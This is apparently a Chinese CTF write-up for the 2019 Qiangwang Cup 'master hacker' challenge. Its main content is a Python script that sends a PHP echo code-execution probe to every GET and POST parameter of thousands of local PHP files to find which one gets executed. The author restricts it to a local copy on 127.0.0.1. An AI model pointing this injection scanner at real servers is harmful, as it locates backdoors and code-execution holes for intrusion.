看了大佬的博客，手动重打了一遍（基本等同于复制粘贴）-_-|| 大佬博客：强网杯 2019 - 高明的黑客（考察代码编写能力） short-code 温馨提示：在本地测试时，PHP 版本需要 >= 7.0；脚本会向每个 PHP 文件的每个参数发送 `echo '123456';` 这种代码执行探测载荷，因此只能针对本机 127.0.0.1 上的题目副本运行；记录结果最好写入文本文件，因为在上千个文件的控制台输出里很难找到！！！！
import os
import re
import requests
import threading
import time
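print("开始时间:" + time.asctime(time.localtime(time.time())))
# At most 100 probe requests in flight at once; get_content holds a slot
# for the duration of one file.
s1 = threading.Semaphore(100)
# Local copy of the challenge sources. Every directory entry is probed
# against the same relative path under http://127.0.0.1/src/.
filepath = r"C:/Users/Lenovo/Desktop/src/"
os.chdir(filepath)
files = os.listdir(filepath)
session = requests.Session()
# Retries have to be set on the mounted adapter: HTTPAdapter binds its
# max_retries default when the class is defined, so reassigning
# requests.adapters.DEFAULT_RETRIES afterwards changes nothing.
session.mount("http://", requests.adapters.HTTPAdapter(max_retries=5))
# requests.Session has no keep_alive attribute (setting one is a no-op);
# asking the server to close each connection is what keeps 100 threads
# from leaving idle sockets on the local PHP server.
session.headers["Connection"] = "close"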
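# Marker that a successfully executed payload prints into the page.
_MARKER = "123456"
# A harmless PHP statement; if the parameter is eval'd (or handed to a
# shell), the marker appears in the response body. This is a code
# execution probe: only ever send it to the local copy on 127.0.0.1.
_PAYLOAD = "echo '%s';" % _MARKER
# Raw strings: '\$' is an invalid escape in a normal string literal.
_GET_RE = re.compile(r"\$_GET\['(.*?)'\]")
_POST_RE = re.compile(r"\$_POST\['(.*?)'\]")
# Serialises appends to flag.txt from the worker threads.
_flag_lock = threading.Lock()


def _extract_params(source):
    """Return (get_names, post_names) for the literal-index forms a PHP source uses.

    Only ``$_GET['x']`` / ``$_POST['x']`` with single quotes are matched;
    double-quoted keys or ``$_REQUEST`` would be missed.
    """
    return _GET_RE.findall(source), _POST_RE.findall(source)


def _executed(resp):
    """True if the marker was produced by execution, not merely reflected.

    A page that just echoes its input back contains the marker inside the
    verbatim payload; requiring strictly more marker hits than payload hits
    filters that common false positive (HTML-escaped reflections can still
    slip through). The body is decoded as UTF-8 as the original probe did.
    """
    resp.encoding = "utf-8"
    text = resp.text
    return text.count(_MARKER) > text.count(_PAYLOAD)


def _confirm_param(url, gets, posts):
    """Re-probe one parameter at a time; return ("GET"|"POST", name) or None.

    Called only after the marker came back when every parameter was sent at
    once; narrows it to the single parameter that is actually executed.
    GET names go through ``params=`` so quotes and spaces are URL-encoded.
    """
    for name in gets:
        with session.get(url, params={name: _PAYLOAD}) as resp:
            if _executed(resp):
                return "GET", name
    for name in posts:
        with session.post(url, data={name: _PAYLOAD}) as resp:
            if _executed(resp):
                return "POST", name
    return None


def get_content(file):
    """Probe one PHP file under http://127.0.0.1/src/ for an executed parameter.

    Reads ``file`` from the current directory (the local source copy) once,
    collects every ``$_GET``/``$_POST`` name it references, sends the echo
    payload in all of them in a single request, and only when the marker
    comes back re-probes parameter by parameter to name the exploitable one.
    A hit is printed and appended to ``flag.txt`` as ``<file> <GET|POST> <name>``.

    Runs under the module semaphore ``s1`` so at most 100 files are probed
    concurrently; the slot is released even if the read or a request fails.
    Unreadable entries (directories, non-UTF-8 files) and network errors are
    reported and skipped instead of killing the thread.
    """
    with s1:
        print(f"trying {file} in {time.asctime(time.localtime(time.time()))}")
        try:
            with open(file, encoding="utf-8") as f:
                # Read once: a second f.read() returns "" and would make the
                # POST list empty.
                source = f.read()
        except (OSError, UnicodeDecodeError) as exc:
            print(f"skip {file}: {exc}")
            return
        gets, posts = _extract_params(source)
        if not gets and not posts:
            # Nothing to inject into; no point hitting the server.
            return
        url = "http://127.0.0.1/src/" + file
        try:
            with session.post(
                url,
                data={n: _PAYLOAD for n in posts},
                params={n: _PAYLOAD for n in gets},
            ) as resp:
                if not _executed(resp):
                    return
            hit = _confirm_param(url, gets, posts)
        except requests.RequestException as exc:
            print(f"request failed for {file}: {exc}")
            return
        if hit is None:
            # Marker appeared only when everything was sent together; worth a
            # manual look, but there is no single parameter to report.
            print(f"marker seen for {file} but no single parameter reproduces it")
            return
        method, name = hit
        print(f"找到了利用文件:{file} 和利用参数:{name} ({method})")
        print("结束时间: " + time.asctime(time.localtime(time.time())))
        # Append rather than overwrite: several threads may hit, and the
        # original "w" mode kept only the last one.
        with _flag_lock, open("flag.txt", "a", encoding="utf-8") as out:
            out.write(f"{file} {method} {name}\n")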
# One worker thread per directory entry; get_content's semaphore caps how
# many are actually talking to the server at a time.
workers = [threading.Thread(target=get_content, args=(name,)) for name in files]
for worker in workers:
    worker.start()
脚本写得比较简陋，因为懒。再次提醒：它只应指向本机 127.0.0.1 上的题目副本。